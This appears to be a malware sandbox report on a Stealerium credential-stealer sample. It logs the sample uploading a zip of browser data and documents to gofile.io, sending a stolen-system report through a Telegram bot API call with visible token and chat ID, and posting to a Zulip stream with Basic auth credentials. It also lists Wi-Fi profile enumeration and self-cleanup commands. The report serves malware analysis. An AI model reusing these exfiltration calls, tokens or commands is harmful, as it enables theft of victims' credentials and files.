2024-11-29 11:28:18 UTC	40	OUT	Data Raw: 2d 2d 35 38 32 39 65 30 35 65 2d 61 31 37 32 2d 34 62 34 34 2d 61 66 66 36 2d 36 31 37 32 36 34 31 39 63 66 34 36 0d 0a Data Ascii: --5829e05e-a172-4b44-aff6-61726419cf46
2024-11-29 11:28:18 UTC	125	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 61 6c 66 6f 6e 73 40 37 36 37 36 36 38 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 6c 66 6f 6e 73 25 34 30 37 36 37 36 36 38 5f 65 6e 2d 43 48 2e 7a 69 70 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=file; filename="user@767668_en-CH.zip"; filename*=utf-8''user%40767668_en-CH.zip
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: 50 4b 03 04 14 00 01 08 00 00 84 33 7d 59 00 00 00 00 0c 00 00 00 00 00 00 00 19 00 00 00 42 72 6f 77 73 65 72 73 2f 45 64 67 65 2f 48 69 73 74 6f 72 79 2e 74 78 74 f9 a2 47 51 d5 b7 15 fe fa 06 03 5c 50 4b 03 04 14 00 09 08 08 00 84 33 7d 59 71 80 43 5d 74 00 00 00 dc 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 2f 46 69 72 65 66 6f 78 2f 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 ec 58 5e 5e 20 36 1b 68 01 ed b2 06 6e 62 a3 b3 cf 5f 32 56 9f c1 2f 74 70 4a ae 53 a7 7d be cd 88 b2 ef a2 40 46 d3 d1 1f 66 ef cb 23 98 15 4c 7c 84 13 dd b6 27 7e 4e 95 26 69 9a 2c 18 ee 64 82 c7 4c 8b df a9 be 49 ce d6 81 44 d3 a7 de 24 50 48 b0 da 3a 2e 0a 3f 3f ac b8 6d 6d 09 22 39 c7 45 d9 21 c4 d0 cd f9 ab 92 c3 06 ff 69 a1 39 c6 7d ab c3 50 4b 07 08 71 80 43 5d 74 00 00 00 Data Ascii: PK3}YBrowsers/Edge/History.txtGQ\PK3}YqC]tBrowsers/Firefox/Bookmarks.txtX^^ 6hnb_2V/tpJS}@Ff#L\|'~N&i,dLID$PH:.??mm"9E!i9}PKqC]t
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: 2f 41 46 57 41 41 46 52 58 4b 4f 2e 70 6e 67 16 a3 d8 bb df 20 c1 0b 59 99 d0 76 13 22 15 93 91 a8 c5 fb bb 69 5e ba 9e 63 95 06 41 3a 27 17 be 3d 68 93 c2 6b 06 97 0b 33 cb 5f c8 32 46 e3 78 ae 5e 0d ac aa f4 4f 5e 11 cb c8 48 25 21 bf 19 0f 49 50 c8 b0 cf 62 45 c3 cb 30 b0 ea fa cf a0 6b 59 fb cd 21 e5 2a 34 69 d1 d1 2b e5 ff da 9a 7e 4c 4c e4 14 0c 04 26 72 9a 07 19 dd e4 af 51 fa 19 46 95 c8 fd 0a db 69 da ec a7 64 2b 6c 62 44 30 92 aa 98 a9 07 8a a4 0d 23 d0 6b f5 37 e7 92 1c 37 66 dc ce 56 da 9d b1 c6 d3 9b 4d 9b cb 65 08 e1 63 f9 09 85 8a b8 b2 e5 90 df fc f4 a5 36 7b 8f 2b 36 b8 b8 3a 66 28 35 bd a3 7b 42 1c 57 ec 6e c8 5a 08 87 42 2a db 6e 16 0f 17 c2 11 01 23 28 29 dd fc 3d 8b b2 19 c3 4f a6 92 04 8f 99 fa 7f 88 7a 79 65 50 25 00 87 9a 32 2c 2d Data Ascii: /AFWAAFRXKO.png Yv"i^cA:'=hk3_2Fx^O^H%!IPbE0kY!4i+~LL&rQFid+lbD0#k77fVMec6{+6:f(5{BWnZBn#()=OzyeP%2,-
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: e4 5e 0e 3c e1 56 6c 08 c7 f6 ea 70 85 bd e2 9e a4 c9 bd e9 3c a1 d4 05 d3 a8 70 34 a4 87 0a 75 fa 46 11 b3 8d 37 65 a6 4f 2a 03 d0 31 7d 7f 45 c4 bd e6 c5 dc da 66 34 7c 1e 72 5f 49 74 f7 29 64 dc 95 ba d5 59 38 fb bf 48 29 39 31 1d 4c 51 6d 8c 8a 92 1f e0 9d 87 63 0d 61 d6 4b 9d e6 07 da fa cf 1d b4 22 43 92 06 d1 80 35 64 e2 2b fe ed 24 62 4b c9 2d f3 bc 92 d9 36 d5 05 4b b0 5f 68 67 a2 6d 18 ff 11 c0 3e 96 f6 e3 c4 72 91 15 d3 c8 46 a7 3b 0e 1d e8 40 77 46 9f 17 07 40 80 e6 51 71 26 c0 a2 a4 b9 ba 4f 50 90 16 b9 e8 36 02 90 8a 1c 78 c7 b1 29 71 b3 b8 7e 90 c7 8b 51 8b 47 cd 9e 8b 18 c2 04 a5 a0 37 b2 77 c5 b3 58 96 2e de 1b ce 90 e7 a6 5e 46 7f 18 7e 64 f0 c8 9d 4e 24 02 63 c9 40 6d 3b a4 56 3f 47 4e 48 58 8c 7b fb 41 13 a8 3d fc 90 6a c8 7e c4 d7 0f Data Ascii: ^<Vlp<p4uF7eO*1}Ef4\|r_It)dY8H)91LQmcaK"C5d+$bK-6K_hgm>rF;@wF@Qq&OP6x)q~QG7wX.^F~dN$c@m;V?GNHX{A=j~
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: bb 2e b2 f9 9c 74 00 0d e0 ad d6 49 07 b4 01 ef f3 ce e0 d5 bc 63 ab 5a 9e 05 47 7e e0 63 d2 fb 16 78 c6 50 0a e2 50 4b 07 08 95 fa 9e d0 90 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 20 52 44 57 44 a7 6d 2d 93 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 61 6c 66 6f 6e 73 2f 44 65 73 6b 74 6f 70 2f 49 56 48 53 48 54 43 4f 44 49 2f 46 41 43 57 4c 52 57 48 47 47 2e 70 64 66 0d f9 ba 38 da e2 6f 3c c4 78 5a 7b 7f a9 4a 62 50 1b d2 98 ac 46 b8 98 25 a2 51 73 65 ab aa 3f c5 96 c4 e2 8d 35 9c 0f da c8 dc fb 37 30 7e ba 5c 30 87 b5 b5 d0 c9 91 07 c5 37 80 f0 e4 d5 16 a7 fe e4 48 9a 1d 05 82 29 4c 2a ba 6b a2 f5 60 18 df 70 75 32 b8 2a ac 1a 90 65 e2 f3 e7 82 2d 88 1c 99 c7 1e 23 74 81 96 09 17 eb 79 Data Ascii: .tIcZG~cxPPKPK RDWDm->Grabber/DRIVE-C/Users/user/Desktop/IVHSHTCODI/FACWLRWHGG.pdf8o<xZ{JbPF%Qse?570~\07H)Lk`pu2e-#ty
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: 28 0a 22 1e 7d e3 8c 87 cb 0f a5 ee 27 4d 1d f3 a7 27 7f 9c 47 f3 6c fa c0 fa 22 be 93 f7 9f 9c 6c 97 98 79 61 f4 21 fe 02 57 fc 90 a3 1f 81 47 a0 86 0e 99 93 2f 57 95 c3 55 0f 32 69 27 52 45 e9 c5 fc 43 77 dd cf dc 7d e9 37 65 df 3a d7 fa 9b eb e0 d4 88 24 eb e2 48 a1 96 8d 58 2e a7 96 aa a3 be 91 b0 eb 5b 8f 83 ee fe c1 e5 ad 22 e8 d3 d6 02 4d ef 05 63 33 ab ed e6 0e 76 41 45 e5 62 aa 54 70 e8 ea fc 62 39 c4 e6 18 af 0a 1e 37 52 74 6f 63 ad 91 8d 51 e9 4e e0 55 93 2d e9 09 a7 bd 45 76 4c 36 96 63 52 51 60 e5 bd 73 21 6b ac 25 e6 df e3 1a 67 c2 54 45 58 b9 71 ad 1d 4e 28 fc df 55 a4 b0 e4 c2 75 ce b2 40 4a b0 86 23 dd 93 99 61 ca 02 58 4f a6 60 f8 42 4c af 6f a8 3b 85 1f e0 c0 c5 8b 9d 76 46 5b 73 80 a9 f9 43 1c db a5 53 1e 30 d9 0f f9 c9 3a 07 26 43 a0 Data Ascii: ("}'M'Gl"lya!WG/WU2i'RECw}7e:$HX.["Mc3vAEbTpb97RtocQNU-EvL6cRQ`s!k%gTEXqN(Uu@J#aXO`BLo;vF[sCS0:&C
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: ab 29 48 4f 4a 7f bf bf 2c e2 08 7a c3 c1 15 cf 2a 31 07 49 5d 81 0c 1d 40 eb 4e 99 2d 85 f6 70 93 b1 e9 4d 94 a2 f0 72 55 54 e9 d1 d7 a1 18 8e 5a e0 3f 85 ad e1 b5 87 0e fe 25 69 4c 06 9b e2 8f 70 86 f1 0f 27 d8 5a c3 19 86 9d 18 dc bb 31 a1 64 17 9b 05 2d dc 5e 4b b8 88 ec 56 38 96 7f 82 29 0d db 52 8c 0d b7 de 20 51 f1 6e 3b 88 b9 de 4e 02 a7 ab 2f be de 37 b7 8c 6b 30 95 fb fc 09 19 9f df db a2 ab 9e a9 8f 1f fe 67 b3 b3 1f 19 d9 6a 82 32 09 c1 3d b9 1d 1a ea 46 42 9e e3 cd 43 35 ec fd 87 b9 1b 62 46 ca 08 fe 3b da 57 28 af fc a1 56 ab 80 23 9c b7 45 fd e0 81 c6 03 09 9c d0 df fa a2 ae 26 70 5e 0e 01 9d f9 2f a3 df 56 60 36 97 bd 58 88 3e 4f e7 f9 b7 f3 d2 44 d9 2e 20 c5 2e de d2 bf 9e a8 aa 5a ce 83 86 89 08 9c 7e 8a b7 fa e2 68 ac 7a 42 3e 4e 44 0d Data Ascii: )HOJ,z*1I]@N-pMrUTZ?%iLp'Z1d-^KV8)R Qn;N/7k0gj2=FBC5bF;W(V#E&p^/V`6X>OD. .Z~hzB>ND
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 61 6c 66 6f 6e 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 55 51 4d 50 43 54 5a 41 52 4a 2e 64 6f 63 78 f8 39 61 49 a2 2d 90 1b 1a 80 9b 3e de 47 64 10 9a 7b 72 61 c9 f9 c9 fe 45 9a 53 91 5e d5 46 ea 80 2f b6 66 b8 cc 3b 75 bb e6 8d 1a a7 55 ea 9c 84 a8 ef 39 58 5c 86 91 e4 08 c7 89 c6 05 04 49 2e ff 9e 98 06 dd 4c 55 bc b4 20 97 92 8a ae 9d 91 23 6b 10 89 1d d9 67 55 99 ab 4e 92 2b 33 c0 db d2 6b b9 fc f6 3f d5 2b a5 22 27 6d c7 67 c8 80 e3 92 55 41 32 c6 5b 77 e0 6e 9a 2b 5f 2c 56 1f 19 1e 56 08 bb c8 93 9d 7d 3c 04 08 6a 1c b2 0f 34 61 a9 b0 d0 eb 5a 46 2e f7 d8 32 db 42 f0 43 e9 f5 c4 02 c0 c4 9d a8 2c 99 8a 05 7f 14 3e 14 81 0f bd c0 78 31 d2 6c 7d 34 a0 d3 05 74 95 5c ff 58 9a 4f dd 67 29 36 bf 4f 1c da f6 fc ed f1 Data Ascii: DRIVE-C/Users/user/Documents/UQMPCTZARJ.docx9aI->Gd{raES^F/f;uU9X\I.LU #kgUN+3k?+"'mgUA2[wn+_,VV}<j4aZF.2BC,>x1l}4t\XOg)6O
2024-11-29 11:28:18 UTC	4096	OUT	Data Raw: fe 50 21 0d 09 8f 04 29 3d 52 c6 73 a1 68 cb 7c 6c 86 93 28 f5 a6 db f3 16 4c b8 de 85 10 28 7e d2 db 0c b8 75 1e 9c 2b ea 9e 30 93 9f 34 75 f0 e8 df 1e 3e ba 76 1e 5f 60 2b c4 fe bd a5 c4 d6 07 07 68 e4 44 f0 12 48 d4 20 d9 fd 85 b9 c2 1e a6 66 9d 04 55 93 73 56 2f 1c d5 3d d0 c5 9c 42 a0 c6 ee d2 c2 91 48 d0 94 ea 02 0b d6 ce 36 eb a0 1b 35 34 53 1f b3 68 a2 cd 46 89 31 68 52 81 69 da ff f0 01 8a 71 ff 3f 87 12 e6 b1 82 c2 78 06 30 2e b4 ef 64 4a 44 38 07 07 75 53 4b c6 a4 e2 f9 6b 86 4c c5 51 c4 8b 43 d2 f5 b8 17 6d ff 9c 67 0c 76 aa 34 2f ca a7 c7 81 e5 7f b9 5f e4 21 56 25 97 b0 c2 72 f8 ad 56 b3 3d ff d8 ab cb 31 00 c6 ce 4f ea cd d5 a1 d0 aa df 16 78 68 2b 4e 68 12 b7 fa 3a c0 47 aa ac 17 45 ee fc 47 52 28 b3 4d cf d2 92 0b c7 e2 cb a7 53 ea be b3 Data Ascii: P!)=Rsh\|l(L(~u+04u>v_`+hDH fUsV/=BH654ShF1hRiq?x0.dJD8uSKkLQCmgv4/_!V%rV=1Oxh+Nh:GEGR(MS
2024-11-29 11:28:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-29 11:28:19 UTC	889	IN	HTTP/1.1 200 OK Server: nginx/1.27.2 Date: Fri, 29 Nov 2024 11:28:19 GMT Content-Type: application/json Content-Length: 440 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range {"data":{"createTime":1732879699,"downloadPage":"https://gofile.io/d/GyFZhD","guestToken":"77OLeVWNA3XKfq7Y0Ll19K7WBfKqV2Z4","id":"a2556112-fa4e-4e20-aaf7-0837598267db","md5":"0dbe52ebc0433a2341768caf9f26abf0","mimetype":"application/zip","modTime":1732879699,"name":"user@767668_en-CH.zip","parentFolder":"97f1ae89-ead1-4fc3-bb24-154c563558b8","parentFolderCode":"GyFZhD","servers":["store5"],"size":118332,"type":"file"},"status":"ok"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49724	149.154.167.220	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:22 UTC	2142	OUT	GET /bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage?chat_id=1386072644&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%206%3A28%3A02%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20767668%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20MKU_6MO7%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28N [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-11-29 11:28:23 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 29 Nov 2024 11:28:23 GMT Content-Type: application/json Content-Length: 1658 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-29 11:28:23 UTC	1658	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 33 35 39 30 32 35 39 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 74 65 6c 74 69 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 65 6c 74 69 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 38 36 30 37 32 36 34 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 70 6f 70 68 69 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 57 53 48 45 41 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 38 37 39 37 30 33 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 65 33 39 20 2a 53 74 65 61 6c 65 Data Ascii: {"ok":true,"result":{"message_id":9,"from":{"id":7835902596,"is_bot":true,"first_name":"steltik","username":"steltik_bot"},"chat":{"id":1386072644,"first_name":"Apophis","username":"DWSHEAD","type":"private"},"date":1732879703,"text":"\ud83d\ude39 *Steale

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49733	3.210.246.148	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:25 UTC	278	OUT	POST /api/v1/messages HTTP/1.1 Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM= Content-Type: application/x-www-form-urlencoded Host: szurubooru.zulipchat.com Content-Length: 1693 Expect: 100-continue Connection: Keep-Alive
2024-11-29 11:28:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-29 11:28:25 UTC	1693	OUT	Data Raw: 74 79 70 65 3d 73 74 72 65 61 6d 26 74 6f 3d 53 7a 75 72 75 62 6f 6f 72 75 26 74 6f 70 69 63 3d 61 6c 66 6f 6e 73 26 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 25 30 41 25 46 30 25 39 46 25 39 38 25 42 39 2b 25 32 41 53 74 65 61 6c 65 72 69 75 6d 2b 76 33 2e 35 2e 32 2b 2d 2b 52 65 70 6f 72 74 25 33 41 25 32 41 25 30 41 44 61 74 65 25 33 41 2b 32 30 32 34 2d 31 31 2d 32 39 2b 36 25 33 41 32 38 25 33 41 30 32 2b 61 6d 25 30 41 53 79 73 74 65 6d 25 33 41 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 2b 25 32 38 36 34 2b 42 69 74 25 32 39 25 30 41 55 73 65 72 6e 61 6d 65 25 33 41 2b 61 6c 66 6f 6e 73 25 30 41 43 6f 6d 70 4e 61 6d 65 25 33 41 2b 37 36 37 36 36 38 25 30 41 4c 61 6e 67 75 61 67 65 25 33 41 2b 25 46 30 25 39 Data Ascii: type=stream&to=Szurubooru&topic=user&content=%60%60%60%0A%F0%9F%98%B9+%2AStealerium+v3.5.2+-+Report%3A%2A%0ADate%3A+2024-11-29+6%3A28%3A02+am%0ASystem%3A+Microsoft+Windows+10+Pro+%2864+Bit%29%0AUsername%3A+user%0ACompName%3A+767668%0ALanguage%3A+%F0%9
2024-11-29 11:28:26 UTC	747	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:25 GMT Content-Type: application/json Content-Length: 81 Connection: close Server: nginx/1.18.0 (Ubuntu) Vary: Accept-Encoding Expires: Fri, 29 Nov 2024 11:28:25 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private Vary: Accept-Language Content-Language: en X-RateLimit-Limit: 200 X-RateLimit-Remaining: 199 X-RateLimit-Reset: 1732879765 Strict-Transport-Security: max-age=15768000 X-Frame-Options: DENY X-Content-Type-Options: nosniff Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Authorization Access-Control-Allow-Methods: GET, POST, DELETE, PUT, PATCH, HEAD {"result":"success","msg":"","id":485078655,"automatic_new_visibility_policy":3}

Target ID:	0
Start time:	06:28:02
Start date:	29/11/2024
Path:	C:\Users\user\Desktop\uyz4YPUyc9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\uyz4YPUyc9.exe"
Imagebase:	0x1d836200000
File size:	3'748'352 bytes
MD5 hash:	49A803AE133197C359EE1460F65370AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2307839115.000001D8389AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2307839115.000001D838846000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2307839115.000001D838AEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:28:08
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x7ff6fdc60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:28:08
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:28:08
Start date:	29/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6bf500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:28:08
Start date:	29/11/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6531c0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:28:09
Start date:	29/11/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff7e27e0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:28:09
Start date:	29/11/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr All
Imagebase:	0x7ff6c9dc0000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:28:09
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x7ff6fdc60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:28:09
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:28:10
Start date:	29/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6bf500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:28:10
Start date:	29/11/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x7ff7e27e0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:28:25
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat"
Imagebase:	0x7ff6fdc60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:28:25
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:28:25
Start date:	29/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6bf500000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:28:25
Start date:	29/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /PID 5276
Imagebase:	0x7ff6463c0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:28:25
Start date:	29/11/2024
Path:	C:\Windows\System32\timeout.exe
